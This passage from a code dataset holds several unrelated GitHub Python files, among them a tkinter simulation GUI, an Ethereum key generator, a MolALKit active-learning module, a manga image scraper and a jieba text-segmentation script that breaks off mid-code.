offTime[0]*60 + offTime[1]\n        afterTime = afterTime[0]*60 + afterTime[1]\n\n        # Get list of on and off times\n        lightCourse: list[tuple[str, float]] = []\n        t0 = t = 0\n        for _ in range(numCycles):\n            # Light starts on\n            lightCourse.append((\"on\", t))\n            # Turns off\n            t += onTime\n            lightCourse.append((\"off\", t))\n            t += offTime\n        \n        t1 = t + afterTime\n        \n        #get array of milliseconds that say when the light is on... if the current time point evaluation is between \n        #light on or off... if not between 2 nonzero values, then light is off?\n\n        # STUFF FROM OLD UPDATE_VAR FUNCTION\n        #delete current simulation values\n        self.x_sim = []\n        self.y_sim = []\n        #set times\n        t_span = np.array([t0, t1])\n        #set initial conditions\n        y0 = np.array([C_CELL0, C_LUMEN0, C_PLASMA0, C_OUT0]) #will probably somehow need to come from the system of equations themselves, solved with an external function\n        #Solve IVP both at intended points and at \n        res = integrate.solve_ivp(f_shed, t_span, y0, args=[self.rates[x] for x in self.rates.keys()] + [lightCourse]) #TO HAVE AN ADAPTIVE SMOOTH TIME.... STUPID???\n        ts = res.t\n        c_cell, c_lumen, c_plasma, c_out = res.y #editor fix: unpack in the same order as y0 above (cell, lumen, plasma, out)\n        #clear the plot of old values\n        plt.cla()\n        #replot \n        self.x_sim = ts\n        self.y_sim = c_out\n        self.ax.set_xlabel('Time', fontsize=16)\n        self.ax.set_ylabel('Concentration/Intensity', fontsize=16)\n        #replot experimental times\n        self.ax.plot(self.x_exp, self.y_exp, marker='o', label=\"experimental\", color = 'blue')\n        #replot t_eval sim times\n        self.ax.scatter(self.x_sim, self.y_sim, label=\"simulation\", color = 'red')\n        self.ax.legend()\n        self.ax.set_title('Experimental and Simulation Plots', fontsize=20) \n        self.canvas.draw()\n        #recalculate RMSE with updated experimental data\n        RMSE_val = rmseCalc(self.x_exp, self.y_exp, ts, c_out)\n        RMSE = str(RMSE_val)\n        self.rmse_label[\"text\"] = f\"RMSE: {RMSE}\"\n    \n    def reset(self):\n        #get rid of all text entries\n        self.t1.delete(0, 'end')\n        self.t2.delete(0, 'end')\n        self.t3.delete(0, 'end')\n        self.t4.delete(0, 'end')\n        #replace default entries\n        self.t1.insert(0, \"0,0\")\n        self.t2.insert(0, \"0,0\")\n        self.t3.insert(0, \"1\")\n        self.t4.insert(0, \"0,0\")\n    \n    def update_sliders_frame(self, construct: str):\n        if construct == \"shed\":\n            for slider in self.var_sliders:\n                slider.enable()\n            self.tuner_title['text'] = 'Rate Constants (PhoCl Shed)'\n            self.bs['state'] = 'normal'\n        else:\n            for slider in self.var_sliders:\n                slider.disable()\n            self.tuner_title['text'] = f'Rate Constants (PhoCl {construct.capitalize()}) - UNIMPLEMENTED'\n            self.bs['state'] = 'disabled'\n    \n    def update_slider_lims(self, n: int, slider_from: float|None, slider_to: float|None):\n        if n < 0 or n >= len(self.var_sliders): #editor fix: off-by-one; len(...) itself is not a valid index\n            return\n        \n        if slider_from is not None: #editor fix: 0 is a valid limit; only skip when no value was given\n            self.var_sliders[n]['from'] = slider_from\n        if slider_to is not None:\n            self.var_sliders[n]['to'] = slider_to\n    \n    def update_rates(self, rate: str, value: float):\n        self.rates[rate] = value\n\n    def onTextClick(self, event):\n        tkinter.messagebox.showinfo(\"Welcome to GFG.\", \"Hi I'm your message\")\n    \n\n    def onConstructChoice(self, event):\n        tkinter.messagebox.showinfo(\"Welcome to GFG.\", \"Hi I'm your message\")\n        #if radiobutton is 1, or 2, or 3, redo the grid placing of the slider frame!\n\n    \n    \n\nwindow=Tk()\n\n#prevent fullscreen\nwindow.resizable(False, False)\n\n#set default font of the GUI\nwindow.option_add( \"*font\", f\"lucida {REG_FONT_SIZE}\" )\n\ninputwin=InputWindow(window)\nwindow.title('Secretion Sim')\n\n#Set the geometry of frame\nwindow.geometry(f\"{WX}x{WY}\")\n\n#Change the default Font that will affect in all the widgets\ndefault_font = nametofont(\"TkDefaultFont\")\ndefault_font.configure(size=16)\ntext_font = nametofont(\"TkTextFont\")\ntext_font.configure(size=16)\nfixed_font = nametofont(\"TkFixedFont\")\nfixed_font.configure(size=16)\n\n#change the row and column weightings \nGrid.rowconfigure(window,0,weight=1)\n#Grid.columnconfigure(window,0,weight=1)\nGrid.rowconfigure(window,1,weight=1)\nGrid.columnconfigure(window, 1, weight=3)\n\nwindow.mainloop()\n\n#EVENTUALLY, USE THE MAIN WINDOW CLASS TO CREATE TABS FOR BOTH THE SPATIAL AND TEMPORAL DYNAMICS\n\n\n\n#VARIABLE CONCENTRATIONS\n#ER\nP_mER = 4\nP_lER = 4\n#CG\nP_mCG = 4\nP_lCG = 4\n#TG\nP_mTG = 4\nP_lTG = 4\n#EC (extracellular)\nP_mEC = 4\nP_lEC = 4\n\n'''CONSTANTS===============================\n\n#PRODUCTION \nalpha_mER = 4 #rate of protein production / transport to ER that is NOT from cis Golgi\nalpha_lER = 4 #rate of degradation/transport to lysosome from ER\n\n#DEGRADATION\n#ER\ndelta_mER = 4 \ndelta_lER = 4\n#Cis 
Golgi\ndelta_mCG = 4\ndelta_lCG = 4\n#Trans Golgi\ndelta_mTG = 4\ndelta_lTG = 4\n#Extracellular\ndelta_mEC = 4\ndelta_lEC = 4\n\n#TRANSPORT\n#ER <=> CG\ntau_mCG_mER = 4 #rate of retrograde transport of POI from mCG to mER\ntau_mER_mCG = 4 #rate of anterograde transport of POI from mER to mCG\ntau_lCG_lER = 4 \ntau_lER_lCG = 4 \n#CG <=> TG\ntau_mCG_mTG = 4 \ntau_mTG_mCG = 4 \ntau_lCG_lTG = 4 \ntau_lTG_lCG = 4 \n#TG <=> EC\ntau_mTG_mEC = 4 \ntau_mEC_mTG = 4 \ntau_lTG_lEC = 4 \ntau_lEC_lTG = 4 \n\n#PHOCL STRENGTH MULTIPLIER\n#ER\nC_mER = 4\nC_lER = 4\n#Cis Golgi\nC_mCG = 4\nC_lCG = 4\n#Trans Golgi\nC_mTG = 4\nC_lTG = 4\n#Extracellular\nC_mEC = 4\n\n\n#COMBINE VARIABLES TO SIMPLIFY FINAL EQUATIONS:\n\n'''\n#https://www.codegrepper.com/code-examples/python/slider+python\n\n\n\n\n \n\n#graph the measured concentrations and the ODE predictions in the same graph\n#sliders will rerun the ODE sim and replot.\n\n\"\"\"\nSLiders should adjust all variables, then rerun the entire simulation with precalculated timestep\nhttps://www.pythontutorial.net/tkinter/tkinter-slider/\nmeasurements should be compared to the theoretical model, and NRMSE value should be calculated and displayed by interpolating for the same time points? \n\"\"\"\n\n\n\n#calculate RMSE values :)\n\n\n","repo_name":"UPenniGEM2022/SecretionModel","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":24456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22966392228","text":"from eth_account import Account\nimport secrets\nimport argparse\nimport json\nfrom collections import defaultdict\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--number\", help=\"number of address to be generated\")\nparser.add_argument(\"-f\", \"--filename\", help=\"file name of the csv\")\nargs = parser.parse_args()\n\nnum_of_address = int(args.number)\nfile_name = args.filename \n\ndef write_csv(address, key):\n with open(file_name +'.csv', 'a') as f:\n f.write(str(address) + ',' + str(key))\n f.write('\\n')\n\ndef write_json(d):\n with open(file_name +'.json', 'a', encoding='utf-8') as f:\n json.dump(d, f, ensure_ascii=False, indent=4)\n\nd = defaultdict(list)\nfor i in range(num_of_address):\n priv = secrets.token_hex(32)\n private_key = \"0x\" + priv\n acct = Account.from_key(private_key)\n write_csv(acct.address, private_key)\n d[acct.address].append(private_key)\nwrite_json(d)","repo_name":"ruggedev/Ethereum-account-generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22370519611","text":"boletim = [[], [], [], []]\nprint('-=' * 35 + '-')\nwhile True:\n o = ' '\n nome = str(input('Insira o nome do aluno: ')).capitalize()\n n1 = float(input(f'Insira a 1ª nota de {nome}: '))\n n2 = float(input(f'Insira a 2ª nota de {nome}: '))\n\n boletim[0].append(nome)\n boletim[1].append(n1)\n boletim[2].append(n2)\n boletim[3].append((n1 + n2)/2)\n\n while o not in 'SN':\n o = str(input('Deseja continuar? 
[S/N]: ')).upper()\n if o == 'N':\n break\n print('-=' * 35 + '-')\nprint('-=' * 35 + '-')\nprint(f'{\"N°\":<4} {\"Aluno\":<8} {\"Média\":>8}')\nfor i, c in enumerate(boletim[0]):\n print(f'{i:<4} {boletim[0][i]:<10} {boletim[3][i]:>8.2f}')\nprint('-=' * 35 + '-')\nwhile True:\n m = int(input('Insira o número do aluno que se deseja conferir às notas(999 saí): '))\n if m in range(len(boletim[1])):\n print(f'O aluno: \\033[32m{boletim[0][m]}\\033[m '\nf'teve às seguintes notas: \\033[32m{boletim[1][m]}\\033[m e \\033[32m{boletim[2][m]}\\033[m')\n print('-=' * 35 + '-')\n if m == 999:\n print('-=' * 35 + '-')\n break","repo_name":"arlendev/exercicios-python","sub_path":"desafios-curso-em-video/desafio_89.py","file_name":"desafio_89.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43215203049","text":"import urllib.request, urllib.parse, urllib.error\nimport re\n\ninp = input('Enter URL: ')\n\nif re.search('^http://', inp):\n inp = re.findall('^http://(\\S+)', inp)[0]\n\n\nif not re.search('\\S+\\.\\S+/\\S+', inp):\n print('Not a proper URL!')\n quit()\n\nhost = inp.split('/')[0]\ndoc = inp.split('/')[1:]\ndocument = str()\nfor i in doc:\n document = document + i\n\n\nfhand = urllib.request.urlopen('http://' + host + '/' + document)\n\ncounter = 0\nfor line in fhand:\n data = line.decode().strip()\n counter = counter + len(data)\n if counter <= 3000:\n print(data)\nprint(counter)\n","repo_name":"KyleOfCanada/py4e","sub_path":"ex_12/ex_12_03.py","file_name":"ex_12_03.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"44095032204","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom abc import ABC, abstractmethod\nfrom typing import List, Tuple\nimport numpy as np\nfrom molalkit.models.random_forest.RandomForestClassifier import RFClassifier\nfrom molalkit.models.gaussian_process.GaussianProcessRegressor import GPRegressor\nfrom molalkit.al.selection_method import get_topn_idx\n\n\nclass BaseForgetter(ABC):\n def __init__(self, batch_size: int = 1, forget_size: int = 1, forget_cutoff: float = None):\n self.batch_size = batch_size\n self.forget_size = forget_size\n self.forget_cutoff = forget_cutoff\n\n @abstractmethod\n def __call__(self, **kwargs) -> Tuple[List[int], List[float]]:\n pass\n\n @property\n @abstractmethod\n def info(self) -> str:\n pass\n\n\nclass BaseRandomForgetter(BaseForgetter, ABC):\n \"\"\"Base Forgetter that uses random seed.\"\"\"\n def __init__(self, batch_size: int = 1, forget_size: int = 1, forget_cutoff: float = None, seed: int = 0):\n super().__init__(batch_size=batch_size, forget_size=forget_size, forget_cutoff=forget_cutoff)\n np.random.seed(seed)\n\n\nclass RandomForgetter(BaseRandomForgetter):\n def __call__(self, data, batch_size: int = 1, **kwargs) -> Tuple[List[int], None]:\n assert batch_size < len(data)\n return np.random.choice(list(range(len(data))), batch_size, replace=False).tolist(), None\n\n @property\n def info(self) -> str:\n return 'RandomForgetter'\n\n\nclass FirstForgetter(BaseForgetter):\n def __call__(self, data, batch_size: int = 1, **kwargs) -> Tuple[List[int], None]:\n assert batch_size < len(data)\n return list(range(batch_size)), None\n\n @property\n def info(self) -> str:\n return 'FirstForgetter'\n\n\nclass MinOOBUncertaintyForgetter(BaseRandomForgetter):\n def __call__(self, model: RFClassifier, data, batch_size: int = 1, 
**kwargs) -> Tuple[List[int], List[float]]:\n        assert batch_size < len(data)\n        assert isinstance(model, RFClassifier)\n        assert model.oob_score is True\n        y_oob_proba = model.oob_decision_function_\n        # uncertainty calculation, normalized into 0 to 1\n        y_oob_uncertainty = (0.25 - np.var(y_oob_proba, axis=1)) * 4\n        # select the top-n points with least uncertainty\n        forgotten_idx = get_topn_idx(y_oob_uncertainty, n=batch_size, target='min')\n        acquisition = y_oob_uncertainty[np.array(forgotten_idx)].tolist()\n        return forgotten_idx, acquisition\n\n    @property\n    def info(self) -> str:\n        return 'MinOOBUncertaintyForgetter'\n\n\nclass MaxOOBUncertaintyForgetter(BaseRandomForgetter):\n    def __call__(self, model: RFClassifier, data, batch_size: int = 1, **kwargs) -> Tuple[List[int], List[float]]:\n        \"\"\" Forget the samples with the highest out-of-bag (OOB) uncertainty.\n\n        Parameters\n        ----------\n        model: Only random forest classifier is supported due to efficient OOB uncertainty calculation.\n        data: The dataset to forget.\n        batch_size: The number of samples to forget.\n\n        Returns\n        -------\n        The index of samples to forget.\n        \"\"\"\n        assert batch_size < len(data)\n        assert isinstance(model, RFClassifier)\n        y_oob_proba = model.oob_decision_function_\n        # uncertainty calculation, normalized into 0 to 1\n        y_oob_uncertainty = (0.25 - np.var(y_oob_proba, axis=1)) * 4\n        # select the top-n points with highest uncertainty\n        forgotten_idx = get_topn_idx(y_oob_uncertainty, n=batch_size)\n        acquisition = y_oob_uncertainty[np.array(forgotten_idx)].tolist()\n        return forgotten_idx, acquisition\n\n    @property\n    def info(self) -> str:\n        return 'MaxOOBUncertaintyForgetter'\n\n\nclass MinOOBErrorForgetter(BaseRandomForgetter):\n    def __call__(self, model: RFClassifier, data, batch_size: int = 1, cutoff: float = None, **kwargs\n                 ) -> Tuple[List[int], List[float]]:\n        assert batch_size < len(data)\n        assert isinstance(model, RFClassifier)\n        assert data.y.ndim == 2\n        assert data.y.shape[1] == 1\n        y_oob_proba = model.oob_decision_function_\n        # absolute OOB prediction error\n        oob_error = np.absolute(y_oob_proba[:, 1] - data.y.ravel())\n        # select the top-n points with lowest error\n        forgotten_idx = get_topn_idx(oob_error, n=batch_size, target='min', cutoff=cutoff)\n        acquisition = oob_error[np.array(forgotten_idx)].tolist() if forgotten_idx else []\n        return forgotten_idx, acquisition\n\n    @property\n    def info(self) -> str:\n        return 'MinOOBErrorForgetter'\n\n\nclass MinLOOErrorForgetter(BaseRandomForgetter):\n    def __call__(self, model: GPRegressor, data, batch_size: int = 1, cutoff: float = None, **kwargs\n                 ) -> Tuple[List[int], List[float]]:\n        \"\"\" Forget the samples with the lowest Leave-one-out cross-validation (LOOCV) error.\n        Parameters\n        ----------\n        model: Only Gaussian process regressor is supported due to efficient LOOCV of GPR.\n        data: The dataset to forget.\n        batch_size: The number of samples to forget.\n        cutoff: The cutoff value of LOOCV error. 
Only samples with LOOCV error lower than cutoff will be forgotten.\n\n        Returns\n        -------\n        The index and the acquisition value of samples to forget.\n        \"\"\"\n        assert batch_size < len(data)\n        assert isinstance(model, GPRegressor)\n        assert data.y.ndim == 2\n        assert data.y.shape[1] == 1\n        y_loocv = model.predict_loocv(data.X, data.y.ravel(), return_std=False)\n        # absolute leave-one-out prediction error\n        loo_error = np.absolute(y_loocv - data.y.ravel())\n        # select the top-n points with lowest error\n        forgotten_idx = get_topn_idx(loo_error, n=batch_size, target='min', cutoff=cutoff)\n        acquisition = loo_error[np.array(forgotten_idx)].tolist() if forgotten_idx else []\n        return forgotten_idx, acquisition\n\n    @property\n    def info(self) -> str:\n        return 'MinLOOErrorForgetter'\n","repo_name":"RekerLab/MolALKit","sub_path":"molalkit/al/forgetter.py","file_name":"forgetter.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"23161600065","text":"import click\n\nfrom .cleanup import cleanup\n\nout_info = lambda m: click.secho(str(m), fg='yellow')\nout_action = lambda m: click.secho(str(m), fg='red')\nout_done = lambda m: click.secho(str(m), fg='green')\n\n\n@click.command()\n@click.option(\"--token\", prompt=\"Github token\", help=\"The personal access token for GitHub\")\n@click.option(\"--owner\", prompt=\"Repository owner\", help=\"The owner of the repository.\")\n@click.option(\"--name\", prompt=\"Repository name\", help=\"The name of the repository.\")\n@click.option(\"--all\", is_flag=True, help=\"Remove all packages. Otherwise keep last version of each package.\")\n@click.option(\"--delete-base\", is_flag=True, help=\"Remove also docker base layer(Dangerous!).\")\ndef clean(token: str, owner: str, name: str, all: bool, delete_base: bool):\n    \"\"\"Removes all packages except current versions from Github.\"\"\"\n\n    cleanup(token, owner, name, all, delete_base, out_info=out_info, out_action=out_action, out_done=out_done)\n\n\nif __name__ == '__main__':\n    clean()\n","repo_name":"Kimaia/github-packages-cleaner","sub_path":"app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
+{"seq_id":"26205864991","text":"# coding=utf-8\nimport threading\nimport serial\nimport time\nimport binascii\nclass myThread (threading.Thread): \n    def __init__(self, threadID, name, port, baud,rootframe,filename):\n        threading.Thread.__init__(self)\n        self.threadID = threadID\n        self.root = rootframe\n        self.app = self.root.appFrame\n        self.currenttab = 0\n        self.thread_stop = True\n        self.magneticdata = 0\n        self.carstatus = 0\n        self.port = port\n        self.baud = baud\n\n\n        self.filename = filename\n        self.sensordata=[]\n        self.count = 0\n        self.update = threading.Thread(target = self.update)\n        self.update.setDaemon(True)\n#        self.update.start()\n    \n    def run(self):\n        '''\n        Parameter:\n        \n        Function:\n            Receive serial data, unpack it, and display it\n        Author: xiaoxiami 2015.5.29\n        Others: runs as a thread \n        Current frame format: header 0x7D, five 16-bit sensor values (big-endian), one 8-bit parking-status byte, one signed 16-bit slope (big-endian), trailer 0x7E \n        '''\n        self.count = 0\n        self.app.identifyuartopen = 1\n        while(1):\n            if(self.thread_stop == True and self.uart.isOpen()==True):\n                self.uart.read(self.uart.inWaiting())\n            time.sleep(0.5)\n            while(self.thread_stop == False and self.uart.isOpen()==True):\n                self.currenttab = self.app.tab\n                if self.currenttab == 3:\n                    buf = self.uart.read(1)\n                    if len(buf)!= 0:\n                        if ord(buf)==0x7D:\n                            # needs changing if not sampling 5 values\n                            
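# Editor note (hedged): the byte arithmetic below could equally use the\n                            # struct module, e.g. struct.unpack('>5H', buf[1:11]) for the five\n                            # big-endian 16-bit sensor words described in the docstring above.\n                            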
buf+=self.uart.read(15)\n                            for v in buf:\n                                self.file = open(self.filename,\"a+\")\n                                self.file.write(binascii.b2a_hex(v)+\" \")\n                                self.file.close()\n                            # needs changing if not sampling 5 values \n                            self.sensordata=[]\n                            self.sensordata.append(ord(buf[1])<<8|ord(buf[2]))\n                            self.sensordata.append(ord(buf[3])<<8|ord(buf[4]))\n                            self.sensordata.append(ord(buf[5])<<8|ord(buf[6]))\n                            self.sensordata.append(ord(buf[7])<<8|ord(buf[8]))\n                            self.sensordata.append(ord(buf[9])<<8|ord(buf[10]))\n                            self.app.Drawonce(count=self.count,value=self.sensordata)\n                            self.root.status.setdata('RX:%s ',self.sensordata) \n                            self.uart.read(self.uart.inWaiting())\n                            self.count+=5\n#                            time.sleep(0.5)\n                            #5 new data points each time\n                            # needs changing if not sampling 5 values\n\n    def update(self):\n        while(1):\n            if(self.sensordata != '' and self.count!=0):\n                self.app.Drawonce(count=self.count,value=self.sensordata)\n                self.root.status.setdata('RX:%s ',self.sensordata) \n            time.sleep(0.2)\n\n    def Creatuart(self):\n        self.uart= serial.Serial()\n        self.uart.port = self.port\n        self.uart.baudrate = self.baud","repo_name":"skyman1991/Graduate-Project","sub_path":"Git_program/DebugPlatform-v3.0/DebugPlatform/identifythread.py","file_name":"identifythread.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
+{"seq_id":"322719968","text":"from flask import Blueprint,request,session,redirect,url_for\nfrom models.item import Item\nfrom models.alert import Alert\nfrom models.stores import Stores\nfrom models.user import User \n\n\nfrom flask import render_template\nimport json\nusersBp=Blueprint('usersBp',__name__)\n\n@usersBp.route('/',methods=['POST','GET'])\ndef reg():\n    if request.method == 'POST':\n        n=request.form.get('name')\n        p=request.form.get('pwd')\n\n        try:\n            r=User.reg(n,p)\n            if not r:\n                raise Exception\n            session['n']=n\n        except Exception as e:\n            return 'user already exists'\n        return session['n']\n\n    return render_template('users/reg.html')\n    \n\n\n\n@usersBp.route('/login',methods=['POST','GET'])\ndef login():\n    if request.method == 'POST':\n        n=request.form.get('name')\n        p=request.form.get('pwd')\n\n        try:\n            if (User.validLogin(n,p)) :\n                session['n']=n\n                #return session['n']\n                return redirect(url_for('alertBp.index'))\n            else:\n                return \"user data wrong\"\n        except Exception as e:\n            return \"user data invalid\"\n\n    return render_template('users/login.html')\n    \n\n@usersBp.route('/logout')\ndef logout():\n    session['n']=None\n    return \"loggedout\"","repo_name":"Shvejan/shopping-price-alerter","sub_path":"blueprints/usersBlueprint.py","file_name":"usersBlueprint.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"12648832587","text":"import re\nfrom bs4 import BeautifulSoup\nimport requests\nimport sys, os, time\n\ndef get_chaps():\n    headers = {\n        'Access-Control-Allow-Origin': '*',\n        'Access-Control-Allow-Methods': 'GET',\n        'Access-Control-Allow-Headers': 'Content-Type',\n        'Access-Control-Max-Age': '3600',\n        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'\n    };\n\n    url = \"https://w3.mangaonepunch.com/\"\n    req = requests.get(url, headers=headers); # editor fix: pass headers as a keyword; passed positionally the dict is sent as query params\n    soup = BeautifulSoup(req.content, \"html.parser\");\n\n    # containers of all chapter's link\n    container = soup.find(\"li\", {\"id\": \"ceo_latest_comics_widget-3\"});\n\n    # List of all a tag within container\n    ls_a_tags = container.find_all(\"a\");\n\n    for a in ls_a_tags[::-1]:\n        yield a.contents[0], a[\"href\"];\n\n\ndef get_chap_imgs(url):\n    # 
sample\n    headers = {\n        'Access-Control-Allow-Origin': '*',\n        'Access-Control-Allow-Methods': 'GET',\n        'Access-Control-Allow-Headers': 'Content-Type',\n        'Access-Control-Max-Age': '3600',\n        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'\n    };\n    \n    req = requests.get(url, headers=headers); # editor fix: headers as keyword argument\n    soup = BeautifulSoup(req.content, \"html.parser\");\n    entry_inner = soup.find(\n        \"div\",\n        {\"class\":\"entry-inner\"});\n\n    ls_pictures = entry_inner.find_all(\"picture\");\n\n    out = [];\n    for pic in ls_pictures:\n        img = pic.find(\"img\");\n        out.append( img[\"src\"] );\n\n    return out;\n\ndef get_chap_imgs_v0(url):\n    # sample\n    headers = {\n        'Access-Control-Allow-Origin': '*',\n        'Access-Control-Allow-Methods': 'GET',\n        'Access-Control-Allow-Headers': 'Content-Type',\n        'Access-Control-Max-Age': '3600',\n        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'\n    };\n    \n    req = requests.get(url, headers=headers); # editor fix: headers as keyword argument\n    soup = BeautifulSoup(req.content, \"html.parser\");\n    entry_inner = soup.find(\n        \"div\",\n        {\"class\":\"entry-inner\"});\n\n    ls_pictures = entry_inner.find_all(\"img\");\n\n    out = [];\n\n    for pic in ls_pictures:\n        out.append( pic[\"src\"] );\n\n    return out;\n\n\n\ndef save_img(url, fn):\n    with open(fn, \"wb\") as f:\n        f.write(requests.get(url).content);\n\ndef parse_name(fn:str)->str:\n    out = re.sub(r'\\s', '_', fn);\n    return out.lower();\n\ndef get_fn_name(url):\n    fn = url.split(\"/\")[-1];\n    return fn.rjust(7, '0');\n\n\ndef crawl():\n    chaps = get_chaps();\n\n    for (chap_name, url) in chaps:\n        print(f\"[+] Downloading chap {chap_name}, url = {url}\");\n\n\n        fn_chap = parse_name(chap_name);\n        os.mkdir(f\"data/{fn_chap}\");\n\n        imgs = get_chap_imgs_v0(url);\n\n        if len(imgs) == 0:\n            imgs = get_chap_imgs(url);\n\n        for img_url in imgs:\n            fn_name = get_fn_name(img_url);\n            fn_pth = f\"data/{fn_chap}/{fn_name}\"\n\n            print(f\"[+] Saving {fn_pth}\");\n            with open(fn_pth, \"wb\") as f:\n                f.write(requests.get(img_url).content);\n            time.sleep(2);\n","repo_name":"Young1906/opm","sub_path":"modules/soup.py","file_name":"soup.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"7878967750","text":"import sys\n\n\n# Average salary ( highest and lowest salary excluded)\ndef average(self, salary: list[int]) -> float:\n    highest = 0\n    totalSum = 0\n    lowest = sys.maxsize\n    for s in salary:\n        highest = max(s, highest)\n        lowest = min(s, lowest)\n        totalSum += s\n    return (totalSum - lowest - highest) / (len(salary) - 2)\n\n\nprint(average(\"\", [1000, 2000, 3000]))\n","repo_name":"mmvergara/mmv-dsa","sub_path":"leetcode/explained/1419.py","file_name":"1419.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
+{"seq_id":"30596286711","text":"import sys\n\nimport toml\nfrom setuptools import setup\n\ntry:\n    from setuptools_rust import RustExtension\nexcept ImportError:\n    import subprocess\n\n    errno = subprocess.call([sys.executable, \"-m\", \"pip\", \"install\", \"setuptools-rust\"])\n    if errno:\n        print(\"Please install setuptools-rust package\")\n        raise SystemExit(errno)\n    else:\n        from setuptools_rust import RustExtension\n\nwith open(\"Cargo.toml\") as fp:\n    version = toml.load(fp)[\"package\"][\"version\"]\n\nsetup_requires = [\"setuptools-rust>=1.1.2\", \"wheel\"]\ninstall_requires = [\"toml~=0.10.2\"]\ntests_require = install_requires + [\"pytest\", 
\"pytest-benchmark\", \"mail-parser\"]\n\nsetup(\n name=\"fast_mail_parser\",\n version=version,\n packages=[\"fast_mail_parser\"],\n rust_extensions=[RustExtension(\"fast_mail_parser.fast_mail_parser\", debug=False)],\n install_requires=install_requires,\n tests_require=tests_require,\n setup_requires=setup_requires,\n include_package_data=True,\n zip_safe=False,\n)\n","repo_name":"namecheap/fast_mail_parser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"34"} +{"seq_id":"17210989197","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n############# 将给定的txt文件进行分词\n# cut(pathSource, pathDictionary, cutType, pathStore, storeType, fileFormat)\n# input parameter:\n# pathSource: 源文件路径,路径下为utf-8编码的多个txt文件\n# pathDictionary: 自定义词典路径\n# cutType:\n# single-分割结果不同的词只出现一次;\n# all-分割结果完整储存;\n# pathStore: 结果存储路径,one-路径+文件名;separate-路径;\n# storeType:\n# one-存储在一个文件中\n# separate-存储在多个文件中\n# fileFormat:\n# txt-支持storeType中的one和separate,存储格式为utf-8\n# csv-支持storeType中的one,存储格式为utf-8\n############## by k 2019/6/16\n\n\nimport re\nimport os\nimport jieba\nimport pandas as pd\n\n\ndef readTxtFile(filename, ec): # 系统默认gb2312, 大文件常用'UTF-8'\n str=\"\"\n with open(filename, 'r', encoding=ec) as f: # 设置文件对象\n str = f.read() # 可以是随便对文件的操作\n return(str)\n\n\ndef buildStopWordList(strStop):\n stopwords = set()\n strSplit = strStop.split('\\n')\n for line in strSplit:\n stopwords.add(line.strip())\n stopwords.add('\\n')\n stopwords.add('\\t')\n stopwords.add(' ')\n return stopwords\n\n\ndef readDir(szDir):\n lstFile = []\n for file in os.listdir(szDir):\n file_path = os.path.join(szDir, file)\n lstFile.append(file_path)\n return lstFile\n\n\ndef buildWordSet(str, setStop): #根据停用词过滤,并利用set去重\n # 过滤数字以及符号\n reg = \"[^A-Za-z\\u4e00-\\u9fa5]\"\n # 将分词、去停用词后的文本数据存储在list类型的texts中\n words = ' '.join(jieba.cut(str)).split(' ') # 利用jieba工具进行中文分词\n setStr = set()\n # 过滤停用词,只保留不属于停用词的词语\n for word in words:\n word = re.sub(reg, '', word)\n if word is not '':\n if word not in setStop:\n setStr.add(word)\n else:\n continue\n else:\n continue\n return setStr\n\n\ndef buildWordList(str, setStop): #根据停用词过滤\n reg = \"[^A-Za-z\\u4e00-\\u9fa5]\"\n # 将分词、去停用词后的文本数据存储在list类型的texts中\n words = ' '.join(jieba.cut(str)).split(' ') # 利用jieba工具进行中文分词\n setStr = []\n # 过滤停用词,只保留不属于停用词的词语\n for word in words:\n word = re.sub(reg, '', word)\n if word is not '':\n if word not in setStop:\n setStr.append(word)\n else:\n continue\n else:\n continue\n return setStr\n\n\ndef cut(pathSource, pathDictionary, cutType, pathStore, storeType, fileFormat):\n ################# 读取停用词列表\n encoding = 'UTF-8' # 默认统一编码\n strStop = readTxtFile(pathDictionary, encoding)\n setStop = buildStopWordList(strStop)\n\n ################# 读取一个文件夹中的的各个比较文档\n lstFile = readDir(pathSource)\n # 获取短文件名列表\n lstFileShow = []\n for szFilename in lstFile:\n lstShortFilename = re.search(r'[^\\\\/:*?\"<>|\\r\\n]+$', szFilename)\n lstMatch = re.findall(r'[^\\.]+', lstShortFilename[0]) # 短文件名 a 没有后缀 .b\n lstFileShow.append(lstMatch[0])\n # print(lstFileShow)\n\n ################# 根据分割需求进行分割\n lstDocContent = []\n for szFileName in lstFile:\n str = readTxtFile(szFileName, encoding) # encoding = 'UTF-8' for large files\n if cutType == 'single':\n str = buildWordSet(str, setStop)\n elif cutType == 'all':\n str = buildWordList(str, setStop)\n lstDocContent.append(str)\n\n # 根据存储要求进行分别存储\n if storeType == 'one':\n if fileFormat == 